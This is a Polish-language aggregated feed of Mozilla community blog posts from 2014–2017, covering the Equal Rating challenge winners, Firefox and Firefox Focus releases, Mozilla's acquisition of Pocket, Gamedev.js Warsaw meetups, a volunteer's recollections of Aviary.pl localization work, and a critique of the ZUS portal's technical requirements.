Dzięki naszej stronie – equalrating.com – dotarliśmy do tysięcy ludzi na całym świecie poprzez webinary, konferencje i mniejsze wydarzenia. Otrzymaliśmy 98 zgłoszeń z 27 krajów, co tylko pokazuje jaki potencjał ma podejście Equal Rating. Wcześniej wiele osób uważało, że łatwy dostęp do Internetu ważny jest dla dużych firm i rządu, teraz zauważyły jak istotny jest on dla wszystkich.

W styczniu nasi jurorzy do półfinału wybrali 5 drużyn. Pracownicy Mozilli przez 6 tygodni wspierali je merytorycznie, aby pomóc półfinalistom doszlifować projekty, które zaprezentowali 9 marca w Nowym Jorku na konferencji Equal Rating. Trzymając się zasady Mozilli, że wszystko powinno być otwarte i jawne, przez kolejny tydzień trwała publiczna ankieta, której wyniki częściowo pomogły jurorom w podjęciu decyzji. Dziś mamy przyjemność ogłosić zwycięzców.

Zwycięzcy

Prawie jednomyślnie zwycięzcą Equal Rating Innovation Challenge został Gram Marg Solution for Rural Broadband, wygrywając 125 000 dolarów. Autorami projektu są profesor Abhay Karandikar, Dean (Faculty Affairs) i Institute Chair Professor of Electrical Engineering oraz Dr Sarbani Banerjee Belur, Senior Project Research Scientist, w Indian Institute of Technology (IIT) w Mumbaju w Indiach.

Dr Sarbani Banerjee Belur (India) prezentująca Gram Marg Solution for Rural Broadband na konferencji w Nowym Jorku

Gram Marg, które w języku Hindi oznacza mapę, zwróciło uwagę jurorów i publiczności skupiając się na potrzebie dostarczenia Internetu do 640,000 wiosek. Zespół pokazał jak wspaniałe rzeczy mogłyby osiągać te społeczności mając dostęp do serwisów e-Governance, systemów płatności, instytucji finansowych i ogólnych informacji. W celu zamknięcia przepaści cyfrowej i wzmocnienia tych wiejskich społeczności zespół Gram Marg stworzył pomysłową i „lokalną” technologię, która wykorzystuje białą przestrzeń na widmie telewizyjnym, co umożliwia pobieranie danych z klastrów WiFi w celu zapewnienia dostępu szerokopasmowego (5G).

Zespół naukowców i praktyków stworzył tanie i odporne na wstrząsy urządzenie TV UHF, które konwertuje sygnał 2.4 Ghz, aby połączyć wioski z trudno dostępnych terenów. Rozwiązanie było testowane w 25 wioskach, a prace miały na celu zmniejszenie kosztów, rozmiarów i udoskonalenie produktów.

„Jesteśmy bardzo szczęśliwi, że jury wybrało nasz projekt” – powiedział profesor Karandikar. „Będziemy kontynuować prace nad naszym rozwiązaniem, aby stało się jeszcze bardziej wydajne. Pracujemy też nad modelem biznesowym, który pomoże lokalnym przedsiębiorcom rozlokować i zarządzać dostępem do sieci. Wierzymy, że zdecentralizowany i stabilny model jest kluczem do sukcesu technologii mającej podłączyć do sieci tych, którzy nie mają do niej dostępu.”

Zdobywcami drugiego miejsca i nagrody w wysokości 75 000 dolarów zostało Afri-Fi: Free Public WiFi, projekt prowadzony przez Tima Humana (Afryka Południowa). Projekt jest rozszerzeniem wysoko ocenianego i odnoszącego sukcesy projektu Isizwe, który oferuje 500MB darmowego transferu każdego dnia, ale najważniejszym jego celem jest stworzenie stabilnego modelu biznesowego poprzez połączenie darmowych sieci wifi w całej Afryce Południowej i zachęcanie użytkowników do współpracy z reklamodawcami.

Zespół zaprezentował sposób, w jaki można użyć danych konsumenckich, chronić prywatność i wzmocnić przedsiębiorczość w ich rozwiązaniu. „Zespół udowodnił jak ich rozwiązanie darmowego Internetu wspiera rozwijające się społeczności w Afryce Południowej. Skupiają się na budowaniu społeczności, partnerstwa, rozwijania lokalnych społeczności przedsiębiorców, a celem tych działań jest dostarczenie Internetu do najbardziej zmarginalizowanych społeczności w Afryce Południowej” powiedział w imieniu jury Marlon Parker, złożyciel Reconstructed Living Labs.

Na koniec, nagrodę w wysokości 30 000 dolarów otrzymał Bruno Vianna (Brazylia) i jego zespół pracujący nad projektem Free Networks P2P Cooperative. Zamiast skupiać się na technologii, projekt obejmuje finansowy i logistyczny model, który może być dostosowany do norm i społeczności wioski. Zespół pracował nad zaangażowaniem grup do wspólnych aktywności, uczył ich korzystania z urządzeń. Jurorzy wzięli pod uwagę innowacyjne podejście zespołu do pomagania społecznościom w budowaniu ich własnej infrastruktury.


Od lewej do prawej:
• Steve Song (Canada), Freemium Mobile Internet (FMI)
• Dr Carlos Rey-Moreno (South Africa), Zenzeleni “Do it for yourselves” Networks (ZN)
• Bruno Vianna (Brazil), Free Networks P2P Cooperative
• Tim Genders (South Africa), Afri-Fi: Free Public WiFi
• Dr Sarbani Banerjee Belur (India), Gram Marg Solution for Rural Broadband

Bardzo dziękujemy wszystkim, którzy wzięli udział w konkursie, naszym jurorom za ich bezcenne rady i czas, mentorów Mozilli, za wsparcie półfinalistów w ulepszaniu ich projektów. Chcemy też podziękować wszystkim, którzy wzięli udział w głosowaniu online. W ciągu tygodnia dostaliśmy prawie 6 000 głosów, głównie na projekty Zenzeleni i Gram Marg.

Mozilla zapoczątkowała tę inicjatywę, ponieważ wierzymy, że wspólne rozwiązania mogą rozwiązać duże problemy. Dzięki temu projektowi nie tylko pokazaliśmy szerszy zakres rozwiązań, ale też rozpoczęliśmy dialog na ich temat i zbudowaliśmy społeczności skupiające się na rozwiązywaniu problemów.

Mamy nadzieję, że Equal Rating przyczyni się do bardziej intensywnych działań światowej społeczności na rzecz zapewnienia wszystkim dostępu do Internetu. Jak powiedział Omobola Johnson, były Minister Technologii Komunikacyjnych Nigerii i partner TLcom „Nie chodzi o problem osób nie mających połączenia z siecią, ale o ludzi, którzy mogą te połączenia tworzyć.” Zgadzamy się z tym całkowicie!

Zapraszamy na stronę equalrating.com, gdzie możesz dołączyć do naszej społeczności. Dziś gratulujemy naszym zwycięzcom za ich wizję i potencjał.

 

kornelia.gruszka, 29 marca 2017, 12:26

17 marca 2017

blog.end3r.com

Gamedev.js Warszawa #2

Drugie spotkanie Gamedev.js odbyło się w Kawiarni Hoża 51 - miejsce na tyle nam się spodobało, że zostaniemy w nim na dłużej.

Gamedev.js Warszawa #2

Jak można się było spodziewać frekwencja na drugim spotkaniu była niższa od pierwszego - wiadomo, że na nowy meetup sporo osób przyjdzie głównie z ciekawości. Mimo wszystko jestem zadowolony z efektu, bo po wszystkich prezentacjach mieliśmy jeszcze sporo czasu na dyskusje.

Sponsorami drugiego spotkania były: Mozilla, 10Clouds, Luxoft oraz BLUR. Zdjęcia znajdziecie tutaj, natomiast poniżej są linki do nagrań:


Pamiętajcie, by zasubskrybować nasz kanał YouTube, śledzić Twittera i Facebooka, oraz dołączyć do dyskusji na grupie Facebookowej. Cały czas poszukujemy także prelegentów i sponsorów - zgłaszajcie się na maila kontakt@gamedevjs.com!

Następne spotkanie odbędzie się już w środę, 22 marca - zapraszamy!
Andrzej Mazur, 17 marca 2017, 15:50

7 marca 2017

Centrum prasowe Mozilli

Wiele nowości w Firefoksie, między innymi wsparcie dla WebAssembly

Dzisiejsze wydanie Firefoksa zawiera nowe funkcje, które poprawiają działanie i bezpieczeństwo Firefoksa na wszystkich urządzeniach.

WebAssembly umożliwia prawie natywne działanie gier i aplikacji

Firefox jest pierwszą przeglądarką, która wspiera WebAssembly, kształtujący się standard zainspirowany przez projekt badawczy Mozilli. WebAssembly sprawia, że złożone aplikacje takie jak gry działają szybciej w przeglądarkach. Dotyczy to między innymi gier wideo w 3D, projektowania wspomaganego komputerowo, edycji wideo i obrazów oraz naukowych wizualizacji. Mamy nadzieję, że dzięki WebAssembly skorzystają też deweloperzy usprawniając wiele istniejących aplikacji.

Aby dowiedzieć się wiecej przeczytaj tego blog posta i obejrzyj wideo:

Łatwiejsze połączenie z Wi-Fi

Jeśli miałeś kiedyś problemy z hotelowym wi-fi, działo się tak prawdopodobnie dlatego, że musiałeś się połączyć przez wyskakujące okienko z logowaniem. Strony te są często problematyczne ze względu na trudności w ich wykryciu przez system operacyjny. Kiedy próbujesz otworzyć stronę, natrafiasz na problem.

Dzisiejsze wydanie automatycznie wykrywa te strony i informuje Cię o potrzebie zalogowania. Co więcej, Firefox zamieni certyfikat błędu na wiadomość zachęcającą do zalogowania się.

 

 

 

 

 

 

Firefox ostrzega przed niebezpiecznym logowaniem

Aby lepiej chronić Cię w sieci stale ulepszamy pasek adresu. Firefox wyświetla teraz ostrzeżenia jeśli klikniesz w pole nazwy użytkownika lub hasła na stronie, która nie ma szyfrowania HTTPS.

 

 

 

 

 

 

Co więcej, w najnowszym wydaniu pojawia się Grid Inspector, którym mogą zainteresować się deweloperzy. Więcej o CSS Grid i narzędziach dla deweloperów dostępnych tylko w Firefoksie dowiecie się na blogu Hacks.

W tym wydaniu poprawiliśmy także bezpieczeństwo i wydajność blokując wszystkie wtyczki używające Netscape Plugin API (NPAPI), poza Flashem. Jeszcze w tym roku planujemy wprowadzić zmiany, dzięki którym Flash będzie aktywowany tylko, jeśli użytkownik się na to zgodzi.

Mamy nadzieję, że podoba Wam się nowe wydanie i czekamy na wasze opinie.

Więcej:

 

 

 

 

 

 

 

kornelia.gruszka, 7 marca 2017, 17:21

28 lutego 2017

Centrum prasowe Mozilli

Mozilla przejmuje Pocket

Denelle Dixon-Thayer

27 lutego 2017

Z przyjemnością ogłaszamy, że Mozilla przejęła Read It Later, Inc., twórcę aplikacji Pocket.

Mozilla stale się rozwija, eksperymentuje i intensyfikuje starania, aby Internet był bezpiecznym, globalnym źródłem informacji dostępnym dla wszystkich. Pocket sprawi, że będziemy bardziej widoczni na urządzeniach mobilnych, a także dostarczy użytkownikom narzędzi potrzebnych by mieć dostęp do wysokiej jakości treści czy niezależnych platform na ich warunkach.

Pocket dołączy do produktów Mozilli razem z przeglądarkami Firefox, skupiając się na promowaniu łatwego dostępu do treści wysokiej jakości. (Link do blog posta przygotowanego przez Pocket). Zespół pracujący przy aplikacji wesprze inicjatywę Mozilli Context Graph.

„Jesteśmy przekonani, że dostępność wysokiej jakości treści w Sieci jest kluczem do utrzymania bezpiecznego Internetu poprzez walkę z narastającą fali centralizacji i zamkniętymi platformami. Pocket daje użytkownikom narzędzia, których potrzebują, aby mogli się angażować i udostępniać treści na własnych zasadach, niezależnie od platformy sprzętowej lub treści. Dzięki temu ich aktywność online może być bardziej bezpieczna, samodzielna i niezależna” – Chris Beard, CEO Mozilli

Pocket wnosi do Mozilli ciekawy projekt z 10 milionami unikalnych użytkowników miesięcznie na iOS, Androidzie i w Sieci oraz ponad 3 miliardami zachowanych treści.

W ciągu ostatniego roku, ściśle współpracując z zespołem pracującym przy Pocket nad zintegrowaniem aplikacji z Firefoksem, stworzyliśmy wspólną wizję tego, co możemy razem zrobić i właśnie to nas połączyło.

„Bardzo dobrze oceniamy współpracę z Mozillą w ciągu ostatniego roku. Jesteśmy ciekawi jak współpraca wpłynie na rozwój aplikacji i nowych produktów dla naszych użytkowników” – Nate Weiner, Pocket CEO

W wyniku przejęcia Pocket będzie własnością Mozilla Corporation i stanie się częścią projektu open source Mozilli.

O Mozilli: Od ponad 15 lat Mozilla staje w obronie otwartej Sieci. Promujemy otwarte standardy, które umożliwiają innowacje i ulepszają Sieć jako platformę dla wszystkich. Dziś, setki milionów ludzi na całym świecie używają przeglądarki Mozilla Firefox na komputerach stacjonarnych, tabletach i innych urządzeniach mobilnych. Więcej informacji na stronie: www.mozilla.org.

O aplikacji Pocket: Pocket, stworzony przez Read It Later, Inc., jest liderem wśród aplikacji, pozwalających zachować treści do przeczytania później. Obecnie korzysta z niego ponad 10 milionów użytkowników miesięcznie, ponieważ jest zintegrowany z aplikacjami takimi jak Flipboard i Twitter. Pocket umożliwia zapisanie artykułów, materiałów wideo i więcej. Zachowane materiały są dostępne na wszystkich urządzeniach i platformach: Firefox, Google Chrome, Safari, iOS, Android i Windows. Więcej informacji: www.getpocket.com/about.

Pobież grafiki Pocket:

 

kornelia.gruszka, 28 lutego 2017, 12:03

13 lutego 2017

blog.end3r.com

Gamedev.js Warszawa #1 można uznać za udany

Pod koniec stycznia wystartowały spotkania Gamedev.js w Warszawie - świetna okazja, by zebrać warszawską (a może i Polską) społeczność twórców gier HTML5 w jednym miejscu.

Gamedev.js Warszawa #1

Pierwsza edycja odbyła się dwa tygodnie temu, we wtorek 31 stycznia w lokalu Państwomiasto. Wypadła bardzo dobrze - przyszło około 50-60 osób, nie było żadnych problemów technicznych, a opinie ludzi były jedynie pozytywne. Zdjęcia (autorstwa współorganizatora, Grześka Bagrowskiego) znajdziecie tutaj, natomiast linki do nagrań z prelekcji (autorstwa Kamila Grabowskiego z Whitestream) są poniżej:


Można tez obejrzeć całą playlistę z tego wydarzenia - pamiętajcie, by zasubskrybować kanał jeśli chcecie być na bieżąco z nagraniami z kolejnych spotkań. Pierwsza edycja odbyła się przy wsparciu sponsorów: Mozilli oraz Iterators - wielkie dzięki za zaufanie od samego początku! Podziękowania także dla prelegentów, którzy poświęcili czas, by opowiedzieć o swoich projektach. Pamiętaj: jeśli masz coś ciekawego o czym chciałbyś opowiedzieć przed społecznością, to odezwij się na kontakt@gamedevjs.com.

Gamedev.js Warszawa #1 people


Po ilości uczestników widać, że meetup ma spory potencjał - planujemy już kolejne spotkania, które chcielibyśmy organizować w miesięcznych odstępach. Co prawda nagrywanie prelekcji oraz kupony na piwo wiążą się z kosztami, ale wydaje nam się, że to jest jedyna słuszna droga. Chcielibyśmy także w przyszłości przygotować nasze naklejki, koszulki i inne gadżety, dlatego poszukujemy sponsorów - zgłoś się na kontakt@gamedevjs.com jeśli Twoja firma jest w stanie wspomóc naszą inicjatywę.

Drugie spotkanie odbędzie się już w następną środę, 22 lutego - zapraszamy wszystkich chętnych, wpadajcie!
Andrzej Mazur, 13 lutego 2017, 16:38

26 stycznia 2017

Centrum prasowe Mozilli

Firefox Focus teraz dostępny w 27 językach – także w języku polskim

Blog-FFx-Focus_Devices_1200x660.jpg

Już wkrótce Dzień Ochrony Danych Osobowych! Z tej okazji Firefox Focus, przeglądarka do prywatnego przeglądania, jest teraz dostępna w 27 językach dla miliardów użytkowników. Członkowie społeczności Mozilli ciężko pracowali nad dostarczeniem wszystkich wersji językowych na czas i jesteśmy im bardzo wdzięczni za pomoc. To oznacza, że mnóstwo użytkowników może używać teraz Focusa do prywatnego przeglądania w swoich językach, nie zostawiając śladów i zachowując swoją aktywność online tylko dla siebie.

Dzięki najnowszej wersji przeglądarki Focus użytkownicy będą mieli większą kontrolę nad swoją aktywnością w internecie. Po udostępnieniu Firefox Focus, zobaczyliśmy jak wielu użytkownikom zależy na prywatnym przeglądaniu stron internetowych, który pozwala użytkownikom na kasowanie ich historii za pomocą jednego dotknięcia. Chcieliśmy dać im możliwość korzystania z tego narzędzia w ojczystym języku.

Dla Mozilli, której priorytetem od zawsze jest globalność i społeczność, był to naturalny krok. Jeśli chcesz przeglądać prywatnie po arabsku, azersku, czesku, walijsku, niemiecku, angielsku (Stany Zjednoczone), esperanto, hiszpańsku (Chile), hiszpańsku (Hiszpania), francusku, węgiersku, indonezyjsku, włosku, japońsku, w języku kabyle, holendersku, polsku, portugalsku (Brazylia), rosyjsku, w języku songhay, słowacku, szwedzku, turecku, ukraińsku, chińsku (uproszczony i tradycyjny), od teraz możesz. Nie kończymy jeszcze prac nad dodawaniem kolejnych języków. Będziemy nadal współpracować z naszą społecznością, aby dodawać nowe języki do aplikacji.

Zależy nam na tym, żeby użytkownicy mogli dopasować nasze produkty do swoich potrzeb. Wraz z najnowszym wydaniem dajemy użytkownikom możliwość wybrania wyszukiwarki, podobnie jak w Firefoksie na iOS, Windows, czy Mac na komputerach stacjonarnych i laptopach.

Z informacji, jakie od Was dostajemy wiemy, że przeglądanie bez pojawiających się niechcianych reklam i śledzenia jest bardzo ważne. Dlatego wielu użytkowników zdecydowało się na wybór Firefox Focus. W dniu Ochrony Danych Osobowych jesteśmy dumni, że możemy udostępnić przycisk „Usuń” (górny prawy róg przeglądarki) wielu ludziom na całym świecie.

Wasze opinie bardzo się dla nas liczą i na ich podstawie będziemy dodawać nowe funkcje, które sprawią, że przeglądanie stron będzie jeszcze bardziej bezpieczne.

Firefox Focus możesz pobrać z  App Store.

Więcej informacji:

kornelia.gruszka, 26 stycznia 2017, 15:50

24 stycznia 2017

Centrum prasowe Mozilli

Firefox wspiera lepsze gry wideo z WebGL2 i ostrzega przed niezabezpieczonymi stronami

Dzisiejsze wydanie Firefoksa zawiera wiele funkcji dla deweloperów i użytkowników, które umożliwiają lepsze i bezpieczniejsze korzystanie z sieci.

WebGL2  umożliwia stosowanie nowej generacji grafik 3D w sieci

Firefox jest pierwszą przeglądarką, która wspiera WebGL2. Bazując na mocnych fundamentach WebGL1, technologia WebGL2 umożliwia korzystanie z nowoczesnych funkcji kart 3D, takich jak transform feedback, rozszerzone teksturowanie i multisampled rendering. Funkcje te nie były wcześniej dostępne dla przeglądarek internetowych i pozwolą deweloperom tworzyć bardziej wyrafinowane i angażujące treści wizualne.

Pełne wsparcie WebGL2 działa na Windows, Mac OS i Linuksie. Więcej informacji na ten temat można przeczytać tutaj.

Jeśli chcielibyście zobaczyć demo WebGL 2, uaktualnijcie Firefoksa do wersji 51 i sprawdźcie After the Flood przygotowane przez PlayCanvas. Poniżej krótkie wideo przedstawiające demo:

Pomoc w identyfikowaniu niebezpiecznych stron

Bezpieczeństwo użytkowników online jest naszym kluczowym priorytetem i od dawna jesteśmy zwolennikami używania HTTPS, które szyfruje Twoje połączenie i pomaga chronić przed śledzeniem w trakcie korzystania z internetu, od bankowości po kontakt z przyjaciółmi.

Od dzisiaj w Firefoksie strony zbierające hasła, jak serwisy e-mail czy banki, ale niezabezpieczone HTTPS będą zaznaczone jako potencjalne zagrożenie.

Do tej pory Firefox używał zielonej kłódki w okienku URL, aby pokazać, że strona jest zabezpieczna. Jeśli było inaczej, zielona kłódka się nie pojawiała. Aby wyraźniej podkreślić możliwe zagrożenie od teraz pojawia się przekreślona na czerwono szara kłódka.

PRZED:

Bezpieczne połączenie (HTTPS)

Bezpieczne połączenie (HTTPS)

 

 

 

 

3

Niezabezpieczone połączenie (HTTP)

PO ZMIANACH:

4

 

 

 

 

 

Po kliknięciu na ikonkę „i” pokaże się informacja, że „Połączenie nie jest bezpieczne” oraz „Dane logowania wprowadzone na tej stronie nie są chronione”.

Więcej szczegółów na temat tego jak rozpoznać niebezpieczne strony znajduje się tutaj.

Kontynuujemy poprawę responsywności z wieloprocesorowym Firefoksem

W zeszłym roku rozpoczęliśmy udostępnianie wieloprocesorowego Firefoksa użytkownikom korzystającym z wersji desktopowej. Dzięki temu Firefox działa w dwóch procesach – jeden dla interfejsu użytkownika i drugi dla treści na stronie. W rezultacie Firefox działa szybciej i jest bardziej responsywny. Dziś ponad połowa użytkowników Firefoksa korzysta z tego rozwiązania. Aktualne wydanie trafi do jeszcze szerszego grona odbiorców, włączając użytkowników korzystających z urządzeń dotykowych z Windowsem, wymagających ułatwień dostępu czy obsługi tekstów od prawej do lewej.

W nowym wydaniu jest też IndexedDB 2, usprawnienie dla standardu API dla lokalnego przechowywania, które na pewno zainteresuje deweloperów.

 

kornelia.gruszka, 24 stycznia 2017, 16:13

14 czerwca 2015

Hubert Gajewski Online

10 lat z Aviary.pl

Kilka miesięcy temu, dokładnie 30 marca, po ponad 10 latach zakończyłem przygodę z Aviary.pl. Wspomniałem już o tym na Twitterze, ale pomyślałem, że może napiszę coś więcej.

Z AviaryPL (bo tak się to na początku nazywało) zetknąłem się na samym początku, gdy ekipa zwana Team Firefox.pl przekształcała się w oficjalny zespół lokalizacyjny Mozilli, właśnie pod nazwą AviaryPL. Przy samych rzeczach związanych z lokalizacją chciałem działać już wcześniej, ale właśnie kończyłem studia, więc nie chciałem deklarować, że będę się czymś zajmował, wiedząc, że nie mam na to czasu. 23 października 2004 odebrałem dyplom ukończenia studiów i nastał dobry moment na to, by się zaangażować.

Pierwsza okazja nadarzyła się tydzień później. Gandalf przetłumaczył teksty na stronę startową Firefoksa, tuż przed wydaniem wersji 1.0, a ja bez zapowiedzi postanowiłem zrobić korektę.

Kawałek strony w HTML-u

Początki były trudne, bo – jak widać – nie miałem zielonego pojęcia o obsłudze Bugzilli… Nie pierwszy raz robiłem korektę tekstu, ale to był przełomowy moment, który wpłynął na to, że zawodowo zająłem się kontrolą jakości.

Warto wspomnieć w jakim otoczeniu wtedy działaliśmy. Internet Explorer miał ponad 90% rynku, a jedynym kryterium jakości stron internetowych było to, czy działają w przestarzałej, ale „jedynej słusznej” przeglądarce internetowej. Dziś – gdzie możliwość wyboru przeglądarki internetowej to coś normalnego – to może wyglądać dziwnie, ale wtedy czuliśmy, że zmieniamy świat. I wygląda na to, że nam się to udało.

Wróćmy do tematu. Wspomniałem o swoich początkach pracy z Aviary.pl, ale jeszcze wtedy formalnie do grupy nie dołączyłem. A zacząłem się tym zajmować, bo używałem już wtedy Firefoksa i jako użytkownik chciałem, by nie było w nim błędów. Chciałem, żeby „mówił” do mnie poprawną polszczyzną, by w tekście nie było literówek, itp. A roboty było sporo. Choć tego nie widać – polski Firefox zawiera kilkanaście tysięcy różnych tekstów po polsku. Albo inaczej: kilkaset tysięcy słów po polsku.

We wrześniu 2006 roku stałem się członkiem zespołu i wtedy zaczął się kolejny ciekawy etap. Zająłem się na dobre kontrolą jakości Firefoksa, toolkitu (części wspólnej kilku programów Mozilli), mozillowych stron internetowych, KompoZera, tłumaczeniem projektu kalendarza (Mozilla Sunbird i rozszerzenie do Thunderbirda – Lightning) i paru innych rzeczy. Czyli jeszcze więcej pracy.

W kolejnym roku zacząłem proponować nowe rzeczy, które przyjęły się na lata (np. cotygodniowe, krótkie spotkania na IRC-u, czy regularne – 2 razy w roku – spotkania „na żywo”). I chyba dobrze mi szło, bo w kwietniu 2008 powierzono mi kierowanie zespołem. Chyba nie do końca wiedziałem w co się pakuję, ale niczego nie żałuję. Trzeba pamiętać, że Aviary.pl nie jest firmą, gdzie można od kogoś wymagać, że zrobi to, za co mu się płaci. To grupa pasjonatów, skupionych wokół wspólnych celów, którzy za darmo oferują swój cenny czas. Motywowanie takich osób (ludzie czasem tracą zainteresowanie, czasem po prostu mają coś ważniejszego do zrobienia), czy rozwiązywanie konfliktów (ludzie czasem się kłócą) było trudniejsze niż myślałem. Naprawdę dużo się wtedy nauczyłem.

W kwietniu 2012 na spotkaniu w Gdańsku ogłosiłem, że czas na zmiany w zespole i nie będę nim już kierował. Pamiętam pierwszy dzień po spotkaniu, bo to było bardzo ciekawe doświadczenie. Wcześniej na rzeczy związane z Aviary.pl poświęcałem 10-30 godzin tygodniowo. Teraz miałem ten czas dla siebie. I nagle okazało się, że nie wiem, co zrobić z tym czasem. Czułem, jakbym odszedł na emeryturę ;-).

Przez ostatnie 2 lata zajmowałem się głównie kontrolą jakości Lightninga i pomagałem przy starcie systemu Firefox OS.

Po 10 fantastycznych latach uznałem, że czas zrobić coś nowego i – trochę zwlekając – w marcu ogłosiłem swoją decyzję o odejściu z zespołu.

Hubert Gajewski, 14 czerwca 2015, 15:41

6 lipca 2014

Hubert Gajewski Online

Google Chrome najpopularniejszą przeglądarką internetową w Polsce

Ponad 5 lat temu, w marcu 2009, mieliśmy do czynienia z dość istotną zmianą. Po wielu latach panowania Internet Explorer przestał być najpopularniejszą przeglądarką internetową w Polsce, wyprzedził go Firefox, któremu zajęło to ponad 4 lata.

Gdy dobrze przyjrzeć się danym z tamtego okresu – na rynku była już dostępna przeglądarka Chrome, która miała 1% udziału. Od tego czasu trochę się zmieniło. Wg danych firmy Gemius od dwóch tygodni to właśnie Chrome jest najpopularniejszą przeglądarką w Polsce.

Chrome: 34,69%, Fierfox 34,52%, Internet Explorer 12,74%, Opera 6,26%, WebKit Mobile 6,01%, Chrome Mobile 2,41%, Safari 2,41%

Warto zwrócić uwagę, jak przez ten czas zmienił się udział w rynku Internet Explorera – poprzednio ponad 45%, a teraz… niecałe 13%.

Hubert Gajewski, 6 lipca 2014, 18:37

21 kwietnia 2014

Hubert Gajewski Online

Aviary.pl w Łodzi

Tydzień temu w weekend Aviary.pl przybyło do Łodzi na kolejne spotkanie robocze. Po raz pierwszy w Łodzi, ale mam nadzieję, że nie ostatni.

Wylądowaliśmy w Starym Kinie. To dość ciekawy obiekt hotelarski (nie jest to hotel), oferujący kilkanaście pokoi – co ciekawe – każdy inny. W każdym pokoju jest fototapeta związaną z jednym z polskich filmów, w niektórych są stare rekwizyty. Na korytarzach stoją stare statywy, telewizory itp. Naprawdę fajne miejsce.

Stary telewizor

Na spotkaniu nie mogło zabraknąć gości. Był Andrzej Mazur, założyciel i szef Encalve Games, autor Captain Rogers, który opowiadał o swoich doświadczeniach z Firefox OS.

Andrzej Mazur

Był też Krzysztof Karwowski z Grajewa (jechał do nas całą noc!), jeden z ponad 2700 Latarników Polski Cyfrowej. Bardzo zapracowany człowiek, którego jednym z ważniejszych zajęć jest szkolenie osób w wieku ponad pięćdziesięciu lat obsługi komputera i korzystania z Internetu. Krzysztof opowiadał ciekawe historie o niektórych z ponad 80 tysięcy osób przeszkolonych w ramach tego programu.

Krzysztof Karwowski

Kadencja dotychczasowego zarządu dobiegła końca, więc wybraliśmy nową szefową Aviary.pl: Sarę Prussak, która dobrała sobie dwie osoby do zarządu: Stefana Plewako i Joasię Mazgaj. Mamy też całkowicie nową komisję rewizyjną: szefem jest Bartosz Piec, któremu będzie pomagał Adrian Kalla i Wojciech Szczęsny (tak mi się przynajmniej wydawało, bo na razie Wojciech nie dał się namówić).

Mieliśmy też tradycyjnie retrospekcję. Najważniejszym dostrzeżonym problemem jest rekrutacja. Bardzo potrzebujemy nowych osób. Pracy przybywa, a ludzi nie. Pałeczkę prowadzenia rekrutacji przejęła niedawno Iwona Białek (która dopiero co do nas dołączyła) i ostro zabrała się do pracy.

Iwona Białek

Tradycyjnie graliśmy w Sabotażystę, Jungle Speed i Mafię.

W pamięci pozostanie mi też wizyta w Jerry’s Burger (chcę tam wrócić!) i w Klubie Spadkobierców (ten drugi nie ze względu na jedzenie, a wystrój lokalu).

Następne spotkanie za pół roku.

Hubert Gajewski, 21 kwietnia 2014, 16:37

16 stycznia 2014

Hubert Gajewski Online

ZUS dyskryminuje co trzeciego pracującego Polaka

Zakład Ubezpieczeń Społecznych chwali się ostatnio tzw. Nowym Portalem Informacyjnym.

Logo PUE Platforma Usług Elektronicznych Zakład Ubezpieczeń Społecznych

Zainteresowałem się tym czymś i udałem się na stronę https://pue.zus.pl/. Mógłbym się od razu przyczepić do tego, że mimo iż strona jest szyfrowana, część elementów jest przesyłana otwartym kanałem. Ale nie o tym chciałem napisać.

Próba rejestracji i regulamin

Wybrałem opcję Zarejestruj profil i moim oczom ukazał się regulamin. Większość ludzi nie czyta takich rzeczy, ale ja to robię. Dzięki temu uniknąłem już nieraz kłopotów. Najbardziej zaciekawił mnie fragment o wymaganiach technicznych:

14. W celu prawidłowego korzystania z NPI niezbędne jest:
1) połączenie z siecią Internet;
2) przeglądarka internetowa:  Internet Explorer w wersji 8 lub nowszej albo Mozilla Firefox w wersji 6 lub nowszej, albo Chrome;
3) system operacyjny: Windows: XP/SP2, 2003, 7 lub Vista albo Linux;
4) włączenie obsługi technologii Java Script oraz tzw. „cookies”;
5) w przypadku niektórych elementów witryny internetowej może być konieczne zainstalowanie i włączenie wtyczki Flash Media Player w najnowszej wersji ze strony Adobe dla przeglądarek wymienionych w pkt 2, jeżeli takiej brakuje lub aktualizacja do najnowszej wersji w przypadku problemów z wyświetlaniem niektórych elementów strony.

Wymagany system operacyjny? I odpada 20% osób

Zacznijmy od systemu operacyjnego. Ja już na dzień dobry nie spełniam wymagań, bo pracuję na OS X. Hmm… no dobra, OS X nie jest w Polsce jakoś bardzo popularny, ale tak samo jest z Linuksem, a jest na liście. No dobra, weźmy coś powszechniejszego. Masz Windows 8? Portal nie jest dla Ciebie. Windows 8.1? Nie. iOS lub Android? Też nie.

Zerknąłem na Ranking.pl, który ma najdokładniejsze dane (bardzo duża próba) o oprogramowaniu używanym przez internautów. I zrobiło się ciekawie. Wziąłem najnowsze dane (6-12.01.2014) i podliczyłem ile osób używa wspierane przez ZUS systemy operacyjne. Dokładnie 80,14%.

5% odpada, bo używa złej przeglądarki internetowej

Komunikat. Twoja przeglądarka nie spełnia minimalnych wymagań Nowego Portalu Informacyjnego. Aktualnie wspierane przeglądarki to: Internet Explorer 8+, Firefox 6+, Chrome 8+. Kontynuuj mimo wszystko

Dalej – popatrzyłem na przeglądarki internetowe. Na liście brakuje przede wszystkim Opery, której (w przypadku wersji biurkowej) używa 6,39% polskich internautów. To wartość dla wszystkich systemów operacyjnych, jeśli założymy, że rozkład jest proporcjonalny (tzn., że Opera jest tak samo popularna niezależnie od systemu), to możemy liczyć dalej. 6,39% z grupy systemów wspieranych (80,14%), to 5,12 punktu procentowego. Odejmujemy i zostaje nam 75,02%.

Kolejne 5% odpada, bo nie ma Flash Playera

Pusty czarny element strony z napisem: http://get.adobe.com

Flasha nie używa 9,86% osób, w tej grupie mamy osoby używające systemów, które już wcześniej policzyłem (więc nie powinienem ich uwzględniać drugi raz): iOS i Androida (przede wszystkim od wersji 4.1). iOS to 2,37%, Android 6,99% (ale jeśli uwzględnić te wersje gdzie nie ma Flasha, to będzie 1,40%). Razem 3,77%. Zostaje nam 6,09%, ta wartość z grupy systemów wspieranych to 4,88 punktu procentowego. Odejmujemy i zostaje nam 70,14%.

Ciasteczka? 2%

Nie ma danych na temat JavaScript, ale mam dane dot. ciasteczek. Nie akceptuje ich 1,69%.

Co trzecia osoba jest dyskryminowana

Dokonujemy analogicznych obliczeń i zostaje nam 68,79%. Tyle osób spełnia wymagania techniczne ZUS-u. Czyli prawie jedna trzecia ich nie spełnia i nie może korzystać z portalu. Czy wyobrażacie sobie, żeby portal internetowy obraził się na co trzecią osobę? A ZUS to robi.

